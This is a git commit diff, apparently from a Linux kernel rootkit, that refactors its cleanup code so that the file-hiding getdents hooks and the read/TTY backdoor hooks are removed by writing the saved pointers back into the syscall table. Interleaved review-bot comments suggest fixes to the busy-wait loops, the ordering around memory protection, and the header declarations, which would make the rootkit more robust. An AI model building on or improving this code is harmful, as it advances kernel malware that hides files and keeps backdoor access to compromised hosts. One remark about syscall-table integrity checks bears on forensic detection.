commit 6d2237b91f812b8249786716f51fa8009333a5f9
parent cfcc31b052f021f6361b5f31215c3137305ff5bf
Author: deurzen <m.deurzen@tum.de>
Date: Sat, 28 Nov 2020 12:00:05 +0100
refactors code
Diffstat:
6 files changed, 31 insertions(+), 30 deletions(-)
diff --git a/src/backdoor.c b/src/backdoor.c
@@ -36,7 +36,7 @@ backdoor_tty(void)
}
void
-disable_backdoor(void)
+unbackdoor(void)
{
if (tty) {
if (current_receive_buf2) {
@@ -49,6 +49,13 @@ disable_backdoor(void)
tty = NULL;
}
+
+ if (sys_read) {
+ while (atomic_read(&read_count) > 0);
+ disable_protection();
+ sys_calls[__NR_read] = (void *)sys_read;
+ enable_protection();
+ }
}
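Review bot: The wait `while (atomic_read(&read_count) > 0);` added to unbackdoor() is unbounded and has an empty body, and read() can block indefinitely, so one reader parked inside the hook keeps this caller spinning on a CPU. At minimum the loop should carry a comment stating that, e.g. `/* spins until no caller is inside the read hook; a blocked read() stalls this indefinitely */`. The guard `if (sys_read)` tests whether the original pointer was saved, not whether the hook is currently installed; if sys_read is filled in at init (not visible here), this block also runs when only the TTY variant was active. The same guard pattern appears in unhide_files() in src/filehide.c. For anyone examining a host, this is where the `__NR_read` slot of the syscall table is written back to the saved pointer, so a table-integrity check would see the entry change at this point.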
diff --git a/src/backdoor.h b/src/backdoor.h
@@ -5,7 +5,7 @@
void backdoor_read(void);
void backdoor_tty(void);
-void disable_backdoor(void);
+void unbackdoor(void);
// hooks
void g7_receive_buf(struct tty_struct *, const unsigned char *, char *, int);
diff --git a/src/channel.c b/src/channel.c
@@ -109,7 +109,7 @@ handle_togglebd(unsigned long arg)
long sarg = (long)arg;
if (!sarg) {
- disable_backdoor();
+ unbackdoor();
rootkit.backdoor = BD_OFF;
msg = "off";
} else if (sarg < 0) {
diff --git a/src/filehide.c b/src/filehide.c
@@ -23,10 +23,19 @@ hide_files(void)
void
unhide_files(void)
{
- disable_protection();
- sys_calls[__NR_getdents] = (void *)sys_getdents;
- sys_calls[__NR_getdents64] = (void *)sys_getdents64;
- enable_protection();
+ if (sys_getdents) {
+ disable_protection();
+ while (atomic_read(&getdents_count) > 0);
+ sys_calls[__NR_getdents] = (void *)sys_getdents;
+ enable_protection();
+ }
+
+ if (sys_getdents64) {
+ disable_protection();
+ while (atomic_read(&getdents64_count) > 0);
+ sys_calls[__NR_getdents64] = (void *)sys_getdents64;
+ enable_protection();
+ }
}
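Review bot: In both branches of unhide_files() `disable_protection();` now precedes the busy-wait, whereas the code removed from remove_hooks() and the new block in unbackdoor() wait first. With this order, whatever protection disable_protection() lifts (its body is outside this diff) stays lifted for the whole, unbounded wait. Swapping the two lines restores the earlier order: `while (atomic_read(&getdents_count) > 0);` then `disable_protection();`, and likewise for the getdents64 branch. The commit message says refactor, but unhide_files() previously did not wait at all, so this is a behavioural change for its existing callers and should be mentioned in the description.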
diff --git a/src/hook.c b/src/hook.c
@@ -61,26 +61,11 @@ init_hooks(void)
void
remove_hooks(void)
{
- if (rootkit.hiding_files) {
- while (atomic_read(&getdents_count) > 0);
- disable_protection();
- sys_calls[__NR_getdents] = (void *)sys_getdents;
- enable_protection();
-
- while (atomic_read(&getdents64_count) > 0);
- disable_protection();
- sys_calls[__NR_getdents64] = (void *)sys_getdents64;
- enable_protection();
- }
+ if (rootkit.hiding_files)
+ unhide_files();
- if (rootkit.backdoor == BD_READ) {
- while (atomic_read(&read_count) > 0);
- disable_protection();
- sys_calls[__NR_read] = (void *)sys_read;
- enable_protection();
- } else if (rootkit.backdoor == BD_TTY) {
- disable_backdoor();
- }
+ if (rootkit.backdoor != BD_OFF)
+ unbackdoor();
}
void
@@ -99,10 +84,6 @@ enable_protection(void)
asmlinkage ssize_t
g7_read(const struct pt_regs *pt_regs)
{
- /* unsigned fd = (unsigned)pt_regs->di; */
- /* char *buf = (char *)pt_regs->si; */
- /* size_t count = (size_t)pt_regs->dx; */
-
return sys_read(pt_regs);
}
diff --git a/src/hook.h b/src/hook.h
@@ -13,6 +13,10 @@ typedef struct {
void *orig;
} sc_hook_t;
+extern atomic_t read_count;
+extern atomic_t getdents_count;
+extern atomic_t getdents64_count;
+
extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents64)(const struct pt_regs *);
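Review bot: The three counters exported here have no comment saying what they count or which code updates them, and the header's include list is not visible in this hunk, so it is unclear whether `atomic_t` is declared for every file that includes hook.h. I would add `#include <linux/types.h>` if it is not already present, plus a comment such as `/* callers currently inside each hook; unhook paths wait for these to reach zero */`. The increment and decrement sites are not part of this diff, so the wording should be confirmed against them.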